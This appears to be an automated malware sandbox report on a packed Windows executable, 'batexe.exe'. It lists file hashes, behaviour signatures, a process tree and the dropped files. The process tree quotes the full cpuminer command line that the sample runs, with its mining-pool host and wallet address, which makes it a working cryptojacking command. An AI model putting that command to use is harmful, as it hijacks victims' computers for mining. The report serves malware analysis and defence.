73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
302s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
12/02/2024, 09:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4828	b2e.exe
2324	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2324	cpuminer-sse2.exe
2324	cpuminer-sse2.exe
2324	cpuminer-sse2.exe
2324	cpuminer-sse2.exe
2324	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4200-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4200 wrote to memory of 4828	4200	batexe.exe	74
PID 4200 wrote to memory of 4828	4200	batexe.exe	74
PID 4200 wrote to memory of 4828	4200	batexe.exe	74
PID 4828 wrote to memory of 2692	4828	b2e.exe	75
PID 4828 wrote to memory of 2692	4828	b2e.exe	75
PID 4828 wrote to memory of 2692	4828	b2e.exe	75
PID 2692 wrote to memory of 2324	2692	cmd.exe	78
PID 2692 wrote to memory of 2324	2692	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4200
- C:\Users\Admin\AppData\Local\Temp\11DD.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\11DD.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\11DD.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\177B.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2324

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\11DD.tmp\b2e.exe

Filesize
1.2MB

MD5
dffd0ad433fd4612dc1c299beac2ade0

SHA1
0b0faa3fee475fb6abb0e122c3bd97bcaf2559f8

SHA256
037344221805c2cdb3e0e48e30d2caf316100b4567cabcae585f516382b688a9

SHA512
0462601546c713c3f90fdf530bc650d092efff0dd41b4397c2ce46237299ea3cc50436561ed3414ff808af95d3c81e700e183e888e2e1d13603adec102b32e14

Download Submit
C:\Users\Admin\AppData\Local\Temp\11DD.tmp\b2e.exe

Filesize
1.2MB

MD5
7b0f4c1d8506067fce25df5de733bcb7

SHA1
053b618c2012c6895e9709696395951acf15c165

SHA256
dd9a3eca69a73709146ebc228a433e0fef43ab6c12c2280725d798c7b494216a

SHA512
45ca44d04c436082073475b0bec73cdd3df1f0cc670d9a3d5dd77fc2b3b60ef870af5912d27269107222850b07234060eefb2d272b96de1367ff544cac506618

Download Submit
C:\Users\Admin\AppData\Local\Temp\177B.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
617KB

MD5
a03cade5f3077844e3d950be3a5b0f0d

SHA1
b4073cc6c3ab8637d13b82ab32aa1c155c06fe28

SHA256
6525981a7564cd693a10d3fa35ba45379acd6ad547a3e58bfa12b42cf1235834

SHA512
e6e716b17acd18db753b590c4dd5c68836e497419191c38060bdf42dc414c0aab42dee66191870b44b343afb640eb62dd2d9b6497a3681fc64b651eb9a4a56c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
555KB

MD5
4a2eba9c252168fa1513123a1b1df8dd

SHA1
83a66bdec644c4160b818a456dbf64c1d54293d3

SHA256
db6212571dfbcda2ee14164a0b79c937b94b2d85519353cc9739a4f0a2db64df

SHA512
e9d339391c20b55a167c510524195b5b814a4535749af799cf6b0bad9ffe3539958fceec09671a4dd90033ba84208b0a38dbe450c91c8a61255bc4570ff7c67f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
630KB

MD5
94c5ab7e04851a86ef7e4576e820aedb

SHA1
34b6de15247efa08f207bb54e4b8c710ae763de5

SHA256
968b785a46f33208983b72739281fad15cdf847479d592b4c4eaea4fb26ce23d

SHA512
b6267662566b7c23df0d2a9dfb758424ccde34675738eaf5454dc3154f4e794bc5cd10aafd29f6f028fa36a543c764959f11b2d3d3eff1d8df3a38aa335870d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
752KB

MD5
f26cb49322ecf091fa5e72010513256a

SHA1
631730e3b7c20611f0254afeb08190539c356e6f

SHA256
2aa3cce122660404fe1f4830da3b21714e24804a73ee6ada4db1f620a6add334

SHA512
0b8ebb400436f90d0ff6f9c65b88cd0aa460dd71a989b3592919ff2a7228a5e857238739772176a2769281b86520e21903c3165fd4c9fa65b08cf49bbb5584c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
953KB

MD5
b77bc9542ed13c7b63b951b04e2beefa

SHA1
d0eb105d88a32ce5cc2ad05bc6480488fc88c2a4

SHA256
c7e5b2d70748ed934a3ca89a3866387d190bff4e8a166b330ec6206a4c1ceb64

SHA512
1a9137a4be76ed7c59f87fca4b91b7bb447c9f81fd21f03d5e1429951532da10f1cdd479b5c02e0b04557abef031113c3eada11632018a8b36d4a10b58a1a4e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
e403e9c027fb72006d6df351468621b0

SHA1
2e781de70ef3a1da255ac416243700a6bf571c6c

SHA256
1a7c168b831fe6d80baf9c01c2c490c2459ac03c1e1b16c21189941cbe452ec8

SHA512
61d64127a004cdad38f68a775a1b0269aa545655a880d0e4c36163f6493c203e862742815420321a8205eebdce3bb606d8e4c05b83b1f1b758bed7c28443ec28

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
605KB

MD5
1ec4e8bce18a3839df0f50d7eddd90f9

SHA1
fa94c7259269bb25203c05a87f35b90201051eb3

SHA256
fc9fbacf45993e970f5cd407628ce0dad4818877d5401938e20ada89dd6a1394

SHA512
ba9f514d8db1b99a565e2054f1247b0d0e788f53bc027a0ec67f23cb3929f110a4162ac70aa48b5b8a9ead469a4c4c35088b23bb4cb6fe3818158e9fcee13e6c

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
645KB

MD5
ef7d6edae2e940c4e72ea7871c4b9240

SHA1
724b14a4ff6de11236419ef9e9edf5176ca18201

SHA256
e21cf73ae6c2ee18cb9e28352763060e523baaa1b1741a38a9d8ce085b60d705

SHA512
ae86cbb4a1cec0d0abd7485431044faa0cbba43253c29ccac3d04dad038688a04f2b594fd740a471dd934c793653b4997ccdba99bbcbe20651f6d094c748ec3b

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
454KB

MD5
0fd4a18f58b84698edcca8566689237a

SHA1
c7633f18bb9dea37d610b4a17c5ced49c7ae6bc0

SHA256
6da550e415eb5dbac61df7ac1d0aa44e2c4fbf3a9b419be0ce4dd7e8ce026a5e

SHA512
3abb9bb0338fb584488d9db5b0cdce2eb6eff78b5a2d235b4a5916a511be71be6e63ad478290908d938857acd69fb90a6fab3ff36bb930617655971041f8d91e

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
552KB

MD5
2a86b935101ceb6d02d8f4eb27a19fac

SHA1
2a3ea625255a34a3b3a9f77154acf47a7ee2079a

SHA256
7fd8398bb31c9c8512a4487cbd098e3b115c7459c50fd5c97f2c7549aabcbe65

SHA512
58ab213518b9be7f3cfe13291304d60ce28fb3162b5e75acc5ed4aab8080ae6db705a19bf12d8fb3c3ffc713862a60b1e3d64694b92c052a355beaa00d08fdb7

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
592KB

MD5
0e9dec8bb45d3e38b6f05c5c12587336

SHA1
d3c026e64dcac921f3a1105ef76e5e672ee07e66

SHA256
fafbaa50b6cbc725ee79eacaf1968f5ab4927c159c7597b4009471fecfa57188

SHA512
6f0a25405e1dbd62cf420493337fbaba89eb5452f1889cbff05a959b3a8be40fd507dd9e8376a637b65463f55f50c7054a7de86dfc658ebe60ab88a734c10b3d

Download Submit
memory/2324-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2324-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2324-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2324-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2324-42-0x00000000580D0000-0x0000000058168000-memory.dmp

Filesize
608KB

Download
memory/2324-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2324-44-0x0000000001140000-0x00000000029F5000-memory.dmp

Filesize
24.7MB

Download
memory/2324-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2324-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2324-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2324-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2324-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2324-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2324-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4200-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4828-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4828-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download